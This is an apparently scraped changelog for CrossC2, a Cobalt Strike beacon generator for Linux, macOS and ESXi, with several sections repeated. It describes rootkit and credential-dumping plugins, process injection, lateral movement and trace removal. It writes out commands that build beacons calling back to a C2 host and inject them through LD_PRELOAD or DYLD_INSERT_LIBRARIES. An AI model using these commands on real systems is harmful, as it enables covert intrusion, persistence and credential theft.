Fix

• Fixed the problem of returning an error in the task execution result when there are multiple User-agent in the profile post and metadata is in the header
• Fix build errors for ESXI platforms

New

• Add new platform: ESXI-bind
• Add support for beacon’s plaintext public key #208

Fix

• Fix when User-Agent is configured at the http header in the profile, causing multiple User-Agent errors when beacon initiates a request
• Fix the mimipenguin plugin was selected in multiple sessions at the same time
• Fix GLIBC compatibility issue of mimipenguin plugin
• Fix GLIBC compatibility issue of cc2_jobs plugin
• Fix GLIBC compatibility issue of auth_rootkit plugin
• Fix GLIBC compatibility issue of ssh_rootkit plugin
• Fix GLIBC compatibility issue of update_script plugin

New

• Add more stable Malleable C2 Profile automatic parsing
• Add new platform: ESXI
• Add new platform: MacOS M1
• Add optional configuration whether to perform upx compression

Fix

• Fix when User-Agent is configured at the http header in the profile, causing multiple User-Agent errors when beacon initiates a request
• Fix the mimipenguin plugin was selected in multiple sessions at the same time
• Fix GLIBC compatibility issue of mimipenguin plugin
• Fix GLIBC compatibility issue of cc2_jobs plugin
• Fix GLIBC compatibility issue of auth_rootkit plugin
• Fix GLIBC compatibility issue of ssh_rootkit plugin
• Fix GLIBC compatibility issue of update_script plugin

New

• Add more stable Malleable C2 Profile automatic parsing
• Add new platform: ESXI
• Add new platform: MacOS M1
• Add optional configuration whether to perform upx compression

Fix

• Fix when User-Agent is configured at the http header in the profile, causing multiple User-Agent errors when beacon initiates a request
• Fix the mimipenguin plugin was selected in multiple sessions at the same time
• Fix GLIBC compatibility issue of mimipenguin plugin
• Fix GLIBC compatibility issue of cc2_jobs plugin
• Fix GLIBC compatibility issue of auth_rootkit plugin
• Fix GLIBC compatibility issue of ssh_rootkit plugin
• Fix GLIBC compatibility issue of update_script plugin

New

• Add more stable Malleable C2 Profile automatic parsing
• Add new platform: ESXI
• Add new platform: MacOS M1
• Add optional configuration whether to perform upx compression

Fix

• Fix the data transmission error when the id of http-post in the c2profile is in the header position

Tips

• Add automatic parsing of Malleable C2 Profile, you can specify C2Profile to let genCrossC2 generate beacon

  genCrossC2 127.0.0.1 4444 cs_key ;config.ini;c2profile.profile@second-section Linux x64 ./beacon

  For more details, see the page of release v3.1.1

Tips 🎉

• Automatic parsing of Malleable C2 Profile is now supported!

Fix

• Fix the compatibility problem of python-import under Python2

New

• Add automatic parsing of Malleable C2 Profile, you can specify C2Profile to let genCrossC2 generate beacon

  genCrossC2 127.0.0.1 4444 cs_key ;;c2profile.profile Linux x64 ./beacon
  genCrossC2 127.0.0.1 4444 cs_key ;config.ini;c2profile.profile@second-section Linux x64 ./beacon
  
  In the console:
      genCrossC2 127.0.0.1 4444 cs_key ";;c2profile.profile" Linux x64 ./beacon
      genCrossC2 127.0.0.1 4444 cs_key \;\;c2profile.profile Linux x64 ./beacon
  

Change

• In the parameter position of rebind_dynamic_lib, the position of C2Profile is newly added, and the parameter separator of each configuration file is changed from : to ;

  rebind.so:config.ini -> rebind.so;config.ini

Fix

• Fix python-import encountering ``` comment symbol parsing errors
• Fix the problem of architecture recognition and root permission recognition error when the session is x86 architecture
• Fix the problem that when the teamserver exits abnormally, the connecting beacon is abnormally disconnected
• Fix the problem of some CDN communication errors

Update 2021-07-13

• Fixed the generation error of specifying rebind_dynamic_lib as an absolute path when running genCrossC2.exe under Windows. (The issue will cause a bug in the automatic generation of beacons in GUI plugins).
• genCrossC2.Win-2022-07-13-bug-fix.zip: issue: #169

New

• genCrossC2 supports ini configuration parsing, can set the symbol parsing name of the communication library, as well as beacon background running, self-deletion, etc.
• Add hook functions of beacon in init (initialization) & retryConnect (reconnection) and other stages.
• Add file management interface to create directory function
• Add file management interface to delete files/directories
• Add process management interface to end process function
• Add session metadata - operating system modification function
• Add session metadata - intranet IP modification function
• Add session metadata - host name modification function
• Add unsetenv function to delete environment variables
• Add CrossC2 web delivery script modification function
• Memory execution scripts (bash/zsh/python) now support passing in external parameters

Change

• When MacOS goes online with a custom protocol, due to system version compatibility issues, the memory parsing and execution method is temporarily canceled, and the local loading method is used.
• Whether the beacon enters the background running mode will be configured by the user, which is convenient to use systemctl for persistence (background strategy is adopted by default).

Tips 🎉

• New configuration method, introducing the ini configuration file
  genCrossC2 127.0.0.1 5555 cs_key null:config.ini MacOS x64 a.out

Fix

• Fix the error when genCrossC2 generates libbeacon with rebind library under Linux-64 https://github.com/gloxec/CrossC2/issues/123
• Fix the error when genCrossC2 generates beacon with rebind library under Windows. (CrossC2 v3.0.0 ~ 3.0.1) https://github.com/gloxec/CrossC2/issues/117

New

• Added Win & Linux & MacOS support for CS4.4 (Default CS<=4.4) https://github.com/gloxec/CrossC2/issues/119

CS4.4:genCrossC2 127.0.0.1 4444 cs_key null Linux x64 ./a.out stager 4.4
CS4.0~4.3: genCrossC2 127.0.0.1 4444 cs_key null Linux x64 ./a.out

fix

• Fix The DYLD_x environment variable under macos is not cleared, causing the child process started by libbeacon.dylib to repeatedly inject the beacon
• Fix bls data error

New

• Added bawait_upload & bawait_upload_raw functions to support function callback after successful file upload
• Added process injection under linux x64. In the ProcessList interface, right click to perform beacon injection to the specified process (tested on Ubuntu)
• Added support for automatic lateral movement using the sshpass scheme. In the Target interface, right-click the host or host list to perform automatic lateral movement.

Tips

• MacOS manually start the dynamic library libbeacon.dylib: DYLD_INSERT_LIBRARIES=./libbeacon.dylib java
• Linux manually start the dynamic library libbeacon.so: LD_PRELOAD=./libbeacon.so java

fix

• File download speed increased

New

• MacOS & Linux support dynamic library beacon.
  LD_PRELOAD=./libbeacon.so java
• Dynamic library beacon supports entering the background to run.(export CC_BG=1)
  export CC_BG=1 && LD_PRELOAD=./libbeacon.so java

Fix

• The online issue of the high version of Linux introduced by the v2.2.4 version
• A bug where memory execution may fail when passing in parameters
• Fix the bug that caused the crash when the network connection is abnormal, for example, the teamserver suddenly exits abnormally when the package is being sent, etc. #106
• The bug that the connect command does not specify a port when connecting to a child node will exit abnormally #95

Update 2021-09-23

• Fix the data error of the CrossC2 generator on the windows platform when rebinding the protocol library #117

New

• CDN server SNI support, now Cloudflare service can be used normally #87
• Linux 32&64 bits have supported procfs to obtain process information

Change

• When beacon is online, [config]: alive will not be displayed by default, and it can be turned on with export CC_DEBUG=1 #78

fix

• Fix v2.2.3 beacon online issue #84 #85

New

• Support for obtaining process list information from procfs on Linux

fix

• Fix the bug that beacon exits when opening the file manager on 32-bit Linux.
• Fix the parsing errors of bcd, bls, bupload and other functions in multi-instruction merge tasks, now you can process the same cna scripts as windows beacon. #81

New

• Add two environment variables to temporarily set the C2 server address for beacon connection. (CCHOST & CCPORT)

export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2

• Add support for bupload function. https://github.com/gloxec/CrossC2/issues/81#issuecomment-841068719

fix

• Fix some bugs that caused the beacon to fail to start when loading the custom communication protocol library.

New

• Add two mandatory beacon running methods for loading custom communication protocol library

1. export CCPATH=/opt/ && /tmp/c2
   (Mandatory setting of a working directory with permissions for beacon, such as /opt/)
2. /tmp/c2 /tmp/c2-rebind.so
   (Mandatory loading of communication protocol library for beacon)

fix

• Fix the problem that the file download speed is too slow (now up to full speed)
• Fix the problem of multiple files at the same time (use the downloads command to view the progress)
• Fix the problem that the /tmp/ directory file permissions on the low-version kernel system do not have the execute permission by default, which causes the beacon to fail to start
• Fix the problem that resources are occupied and cause failure when beacon is repeatedly online on a low-version kernel system
• Fix the problem that files landing on low-version kernel systems face name conflicts and fail to run

Change

• Only CS 4.x (>=4.1) version is supported, lower versions will no longer be supported.

fix

• Fix the protocol rebinding error of the low version of Linux kernel

New

• C2 domain name resolution #35
• Support continuous invocation of memory execution components
• Support for adding shell aliases for memory execution, so that other people in the team can directly call the loaded memory execution components through shell commands
• python-import support, like powershell-import to provide convenience for python execution
• low version GLIBC support of genCrossC2 #52

New

• Supports running scripts from memory (bash/python/perl/ruby/php/..)

fix

• Fix the problem of path errors caused by backslashes when uploading files in the file management office
• Long-term testing in various scenarios in the real environment, fixing some hidden problems, and now more stable

New

• Support for lower kernel version systems
• Environment variables are automatically set at startup
• Delete sensitive env records at startup
• The background service process can be linked to the init process at startup
• Increase session spawn function
• Increase the function of session setting environment variables
• Increase the privilege escalation function of session getsystem
• Increase session analysis function to handle multiple merge tasks
• Increase Mac & Linux lateral movement function

fix

• fix genCrossC2's bug about protocol rebinding.

fix

• fix Linux daemon process and joblist display problem.